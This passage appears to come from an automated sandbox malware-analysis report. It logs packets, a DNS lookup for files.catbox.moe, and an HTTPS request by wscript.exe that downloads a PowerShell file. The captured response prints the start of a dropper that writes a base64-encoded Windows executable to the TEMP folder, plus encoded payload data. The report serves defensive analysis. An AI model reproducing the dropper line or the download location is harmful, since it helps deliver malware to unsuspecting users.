                                                      Dec 18, 2024 13:37:43.630836964 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.630856991 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.630898952 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.638046026 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.638072014 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.638179064 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.638199091 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.638272047 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.646760941 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.646790981 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.646881104 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.646902084 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.646945953 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.659835100 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.659861088 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.659990072 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.660012960 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.660067081 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.787625074 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.787652969 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.787777901 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.787808895 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.787853003 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.795213938 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.795238972 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.795331001 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.795355082 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.795393944 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.801846027 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.801870108 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.801922083 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.801944017 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.801971912 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.801989079 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.808638096 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.808662891 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.808717012 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.808736086 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.808767080 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.808785915 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.815553904 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.815577984 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.815645933 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.815664053 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.815728903 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.822930098 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.822956085 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.823031902 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.823048115 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.823098898 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.830595016 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.830616951 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.830682039 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.830710888 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.830755949 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.851620913 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.851650000 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.851720095 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.851749897 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.851809025 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.851809025 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.979060888 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.979088068 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.979166985 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.979193926 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.979243040 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.986346960 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.986371994 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.986433029 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.986454010 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.986493111 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.992625952 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.992651939 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.992724895 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.992748022 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.992772102 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.992794991 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.001838923 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.001861095 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.001977921 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.002003908 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.002054930 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.009702921 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.009728909 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.009797096 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.009830952 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.009850979 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.009872913 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.015548944 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.015568018 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.015665054 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.015707016 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.015772104 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.022092104 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.022118092 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.022176027 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.022217989 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.022241116 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.022270918 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.043276072 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.043302059 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.043368101 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.043395996 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.043417931 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.043436050 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.171437025 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.171458960 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.171638012 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.171663046 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.171717882 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.178559065 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.178582907 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.178690910 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.178710938 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.178755999 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.185884953 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.185910940 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.186019897 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.186038971 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.186079979 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.193558931 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.193594933 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.193758011 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.193778992 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.193833113 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.199322939 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.199350119 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.199454069 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.199471951 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.199538946 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.207233906 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.207263947 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.207354069 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.207377911 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.207421064 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.214303970 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.214333057 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.214428902 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.214448929 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.214497089 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.235683918 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.235709906 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.235842943 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.235860109 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.235897064 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.363070965 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.363096952 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.363183022 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.363202095 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.363239050 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.370313883 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.370338917 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.370450020 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.370470047 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.370512009 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.377794981 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.377823114 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.377923012 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.377940893 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.377983093 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.384233952 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.384258032 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.384310961 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.384330988 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.384363890 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.384402990 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.391267061 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.391298056 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.391355038 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.391377926 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.391482115 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.399653912 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.399684906 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.399753094 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.399775028 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.399816990 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.406443119 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.406472921 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.406635046 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.406653881 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.406719923 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.549247980 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.549272060 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.549408913 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.549427986 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.549487114 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.556341887 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.556368113 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.556569099 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.556583881 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.556619883 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.563282967 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.563308954 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.563433886 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.563452959 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.563510895 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.569472075 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.569499016 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.569721937 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.569739103 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.569785118 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.571321964 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.571388960 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.571397066 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.571439981 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.571563959 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.571577072 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:44.571599960 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:44.571624041 CET49701443192.168.2.7108.181.20.35

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Dec 18, 2024 13:37:39.784214020 CET5846853192.168.2.71.1.1.1
                                                      Dec 18, 2024 13:37:40.131613970 CET53584681.1.1.1192.168.2.7

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Dec 18, 2024 13:37:39.784214020 CET192.168.2.71.1.1.10xfab0Standard query (0)files.catbox.moeA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Dec 18, 2024 13:37:40.131613970 CET1.1.1.1192.168.2.70xfab0No error (0)files.catbox.moe108.181.20.35A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • files.catbox.moe

                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.749701108.181.20.354437424C:\Windows\System32\wscript.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-12-18 12:37:42 UTC330OUTGET /q8ynky.ps1 HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-ch
                                                      UA-CPU: AMD64
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                      Host: files.catbox.moe
                                                      Connection: Keep-Alive
                                                      2024-12-18 12:37:42 UTC552INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Wed, 18 Dec 2024 12:37:42 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 1035728
                                                      Last-Modified: Tue, 17 Dec 2024 22:01:01 GMT
                                                      Connection: close
                                                      ETag: "6761f49d-fcdd0"
                                                      X-Content-Type-Options: nosniff
                                                      Content-Security-Policy: default-src 'self' https://files.catbox.moe; style-src https://files.catbox.moe 'unsafe-inline'; img-src 'self' data:; font-src 'self'; media-src 'self'; object-src 'self';
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Methods: GET, HEAD
                                                      Accept-Ranges: bytes
                                                      2024-12-18 12:37:42 UTC15832INData Raw: 24 70 3d 5b 49 4f 2e 50 61 74 68 5d 3a 3a 43 6f 6d 62 69 6e 65 28 24 65 6e 76 3a 54 45 4d 50 2c 22 78 2e 65 78 65 22 29 0d 0a 5b 49 4f 2e 46 69 6c 65 5d 3a 3a 57 72 69 74 65 41 6c 6c 42 79 74 65 73 28 24 70 2c 5b 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75
                                                      Data Ascii: $p=[IO.Path]::Combine($env:TEMP,"x.exe")[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUu
                                                      2024-12-18 12:37:42 UTC16384INData Raw: 77 42 4a 41 47 45 41 4d 41 42 4c 41 45 6b 41 55 67 42 61 41 46 63 41 5a 41 42 32 41 45 59 41 54 51 42 6d 41 47 6b 41 59 77 42 7a 41 47 4d 41 55 77 42 71 41 48 41 41 59 77 42 6e 41 47 34 41 57 51 42 74 41 48 51 41 57 41 41 7a 41 47 63 41 61 77 42 32 41 48 59 41 57 67 42 79 41 44 67 41 59 77 42 50 41 48 55 41 52 77 42 42 41 48 55 41 53 77 41 72 41 47 6b 41 53 51 42 75 41 48 55 41 65 67 42 33 41 47 73 41 59 51 42 4f 41 48 6b 41 64 41 42 49 41 46 59 41 54 41 42 61 41 46 6b 41 4c 77 42 68 41 45 34 41 4d 77 42 4a 41 47 49 41 63 41 42 77 41 47 34 41 65 51 42 75 41 43 73 41 5a 51 42 55 41 45 6f 41 62 41 42 31 41 46 41 41 63 77 41 7a 41 47 38 41 62 77 42 48 41 45 38 41 61 77 41 31 41 46 63 41 51 51 42 4b 41 47 77 41 64 41 41 35 41 45 45 41 51 51 42 79 41 47 51 41
                                                      Data Ascii: wBJAGEAMABLAEkAUgBaAFcAZAB2AEYATQBmAGkAYwBzAGMAUwBqAHAAYwBnAG4AWQBtAHQAWAAzAGcAawB2AHYAWgByADgAYwBPAHUARwBBAHUASwArAGkASQBuAHUAegB3AGsAYQBOAHkAdABIAFYATABaAFkALwBhAE4AMwBJAGIAcABwAG4AeQBuACsAZQBUAEoAbAB1AFAAcwAzAG8AbwBHAE8AawA1AFcAQQBKAGwAdAA5AEEAQQByAGQA
                                                      2024-12-18 12:37:43 UTC16384INData Raw: 67 42 74 41 45 6b 41 62 51 41 72 41 45 38 41 65 51 42 77 41 45 4d 41 51 51 42 43 41 44 41 41 56 77 42 49 41 44 55 41 53 51 41 72 41 44 49 41 55 77 42 34 41 44 51 41 56 41 42 4f 41 47 6b 41 4d 77 42 44 41 48 6b 41 4d 67 42 31 41 48 45 41 56 77 42 6b 41 44 59 41 53 77 42 4a 41 47 45 41 5a 67 42 71 41 45 30 41 62 51 42 36 41 45 49 41 4f 41 42 44 41 48 55 41 61 51 42 69 41 47 4d 41 61 41 42 45 41 48 41 41 51 67 41 33 41 47 6f 41 4b 77 42 78 41 47 30 41 59 77 42 6e 41 46 63 41 52 41 42 75 41 45 38 41 64 77 41 76 41 48 55 41 4e 67 42 6e 41 46 45 41 55 51 42 54 41 47 6f 41 5a 41 42 74 41 45 77 41 64 77 42 55 41 44 51 41 4e 67 41 76 41 48 55 41 55 41 41 34 41 45 34 41 56 77 42 57 41 48 55 41 54 41 41 31 41 45 55 41 54 41 41 35 41 44 55 41 4d 51 42 70 41 46 55 41
                                                      Data Ascii: gBtAEkAbQArAE8AeQBwAEMAQQBCADAAVwBIADUASQArADIAUwB4ADQAVABOAGkAMwBDAHkAMgB1AHEAVwBkADYASwBJAGEAZgBqAE0AbQB6AEIAOABDAHUAaQBiAGMAaABEAHAAQgA3AGoAKwBxAG0AYwBnAFcARABuAE8AdwAvAHUANgBnAFEAUQBTAGoAZABtAEwAdwBUADQANgAvAHUAUAA4AE4AVwBWAHUATAA1AEUATAA5ADUAMQBpAFUA
                                                      2024-12-18 12:37:43 UTC16384INData Raw: 41 41 72 41 47 67 41 55 51 42 6d 41 45 45 41 61 51 42 32 41 48 59 41 4d 51 41 7a 41 47 30 41 4e 41 42 57 41 46 6f 41 55 67 42 36 41 45 73 41 54 67 42 59 41 45 73 41 53 67 41 7a 41 47 49 41 55 41 42 78 41 48 45 41 54 77 41 72 41 44 49 41 4e 77 42 69 41 47 45 41 59 77 42 71 41 44 59 41 54 51 42 6c 41 45 67 41 51 67 42 73 41 46 6f 41 4d 41 41 34 41 46 55 41 65 41 42 53 41 46 4d 41 51 77 42 6e 41 46 67 41 55 41 42 51 41 44 67 41 59 77 42 46 41 47 34 41 55 77 42 76 41 44 67 41 65 51 41 31 41 46 55 41 61 51 41 7a 41 47 49 41 56 51 42 57 41 48 6b 41 4b 77 42 73 41 45 63 41 52 67 41 30 41 48 45 41 53 41 42 54 41 45 45 41 55 51 42 49 41 47 38 41 53 77 42 6e 41 45 30 41 52 67 42 5a 41 44 67 41 64 51 42 44 41 44 63 41 56 77 42 54 41 47 55 41 4e 77 41 79 41 47 67 41
                                                      Data Ascii: AArAGgAUQBmAEEAaQB2AHYAMQAzAG0ANABWAFoAUgB6AEsATgBYAEsASgAzAGIAUABxAHEATwArADIANwBiAGEAYwBqADYATQBlAEgAQgBsAFoAMAA4AFUAeABSAFMAQwBnAFgAUABQADgAYwBFAG4AUwBvADgAeQA1AFUAaQAzAGIAVQBWAHkAKwBsAEcARgA0AHEASABTAEEAUQBIAG8ASwBnAE0ARgBZADgAdQBDADcAVwBTAGUANwAyAGgA
                                                      2024-12-18 12:37:43 UTC16384INData Raw: 77 42 32 41 48 51 41 54 41 42 77 41 48 55 41 4e 67 42 53 41 44 55 41 56 41 42 47 41 46 6b 41 52 41 42 73 41 47 38 41 63 51 41 78 41 45 77 41 56 67 42 4d 41 47 49 41 4f 41 42 45 41 47 4d 41 52 67 42 55 41 46 41 41 55 67 42 6c 41 47 63 41 59 67 42 72 41 45 34 41 55 51 41 32 41 45 49 41 64 77 42 7a 41 45 49 41 52 67 42 79 41 45 38 41 4c 77 42 55 41 45 55 41 59 51 42 34 41 47 73 41 5a 67 42 44 41 44 67 41 54 41 42 72 41 47 63 41 4d 51 42 4c 41 48 41 41 4e 67 42 4e 41 46 4d 41 63 67 42 58 41 47 51 41 55 77 42 4b 41 45 51 41 56 77 42 54 41 43 73 41 61 41 42 49 41 45 38 41 54 41 42 78 41 44 45 41 64 67 41 7a 41 47 67 41 57 51 42 33 41 44 41 41 5a 67 41 30 41 44 45 41 61 77 42 70 41 48 45 41 52 67 41 33 41 44 41 41 57 51 42 6e 41 47 4d 41 4b 77 42 73 41 48 4d 41
                                                      Data Ascii: wB2AHQATABwAHUANgBSADUAVABGAFkARABsAG8AcQAxAEwAVgBMAGIAOABEAGMARgBUAFAAUgBlAGcAYgBrAE4AUQA2AEIAdwBzAEIARgByAE8ALwBUAEUAYQB4AGsAZgBDADgATABrAGcAMQBLAHAANgBNAFMAcgBXAGQAUwBKAEQAVwBTACsAaABIAE8ATABxADEAdgAzAGgAWQB3ADAAZgA0ADEAawBpAHEARgA3ADAAWQBnAGMAKwBsAHMA
                                                      2024-12-18 12:37:43 UTC16384INData Raw: 77 42 79 41 45 45 41 4e 41 42 4e 41 45 6b 41 54 67 42 75 41 46 59 41 51 77 42 35 41 47 73 41 59 51 42 5a 41 46 59 41 53 77 42 48 41 46 6b 41 56 41 42 42 41 46 55 41 65 67 41 76 41 45 63 41 57 51 42 36 41 45 4d 41 55 67 42 59 41 46 63 41 4c 77 42 7a 41 47 34 41 61 41 42 72 41 46 6f 41 57 41 42 72 41 47 49 41 5a 67 42 32 41 47 30 41 64 77 41 77 41 45 34 41 63 77 42 33 41 47 55 41 59 77 42 6d 41 44 55 41 5a 77 42 6d 41 44 51 41 62 67 41 30 41 47 38 41 65 41 41 33 41 45 77 41 64 67 41 79 41 44 67 41 56 51 42 6c 41 47 73 41 5a 41 42 6f 41 45 55 41 52 77 42 4d 41 46 59 41 59 77 42 32 41 48 51 41 5a 41 42 73 41 45 6b 41 62 67 42 6e 41 46 51 41 63 51 42 4c 41 48 41 41 54 67 42 76 41 44 55 41 4e 67 41 30 41 46 67 41 57 51 41 31 41 48 63 41 5a 51 42 35 41 47 45 41
